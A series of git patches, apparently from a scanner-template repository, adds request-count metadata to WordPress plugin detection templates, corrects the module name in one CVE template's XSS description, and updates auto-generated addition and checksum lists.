b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From e6912e6342068a3c7ebe0b9a70275fb612b93683 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 11 Sep 2023 13:09:49 +0530 Subject: [PATCH 0279/1090] corrected description --- http/cves/2023/CVE-2023-39676.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 3fc6ff4a37..ddaa910db8 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -5,7 +5,7 @@ info: author: meme-lord severity: medium description: | - SimpleImportProduct Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php. + Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php. reference: - https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/ metadata: From 892ebaa6acb66d87f8a63dff9040fefd48539990 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 11 Sep 2023 10:11:44 +0000 Subject: [PATCH 0280/1090] Auto Generated New Template Addition List [Mon Sep 11 10:11:44 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5c87c06231..116651de89 100644 --- a/.new-additions +++ b/.new-additions @@ -17,6 +17,7 @@ http/cves/2023/CVE-2023-34192.yaml http/cves/2023/CVE-2023-36844.yaml http/cves/2023/CVE-2023-38433.yaml http/cves/2023/CVE-2023-39361.yaml +http/cves/2023/CVE-2023-39598.yaml http/cves/2023/CVE-2023-39600.yaml http/cves/2023/CVE-2023-4634.yaml http/exposed-panels/aspcms-backend-panel.yaml From 952c709d99d517165a0adbea6d98a63749ebb58d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 11 Sep 2023 10:11:51 +0000 Subject: [PATCH 0281/1090] Auto Generated Templates Checksum [Mon Sep 11 10:11:51 UTC 2023] :robot: --- templates-checksum.txt | 403 +++++++++++++++++++++-------------------- 1 file changed, 202 insertions(+), 201 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 352d2f8c11..8ad11d572d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2634,6 +2634,7 @@ http/cves/2023/CVE-2023-39141.yaml:ddb042a08cb413a97f662fbc0aa107a5d4a5574a http/cves/2023/CVE-2023-39143.yaml:57dbbf664e21aed709d1d1001b3c2f81d42ee9a4 http/cves/2023/CVE-2023-3936.yaml:718e00aebfd9ba084426938d53da33c2b084fc42 http/cves/2023/CVE-2023-39361.yaml:027864ed06754ef87a7de376519681d526b46eb6 +http/cves/2023/CVE-2023-39598.yaml:8e973be5da8bbccce493cb02d6a2c314605b02a6 http/cves/2023/CVE-2023-39600.yaml:c326d0e518d5a41c899dbf0a15c6d4e28f00b705 http/cves/2023/CVE-2023-4173.yaml:add4098ac7435ecc0fc9c55e00232d441b522a1f http/cves/2023/CVE-2023-4174.yaml:1902cb27adf5853b7f3cd5312963e6dddfb2a298 @@ -5813,218 +5814,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba 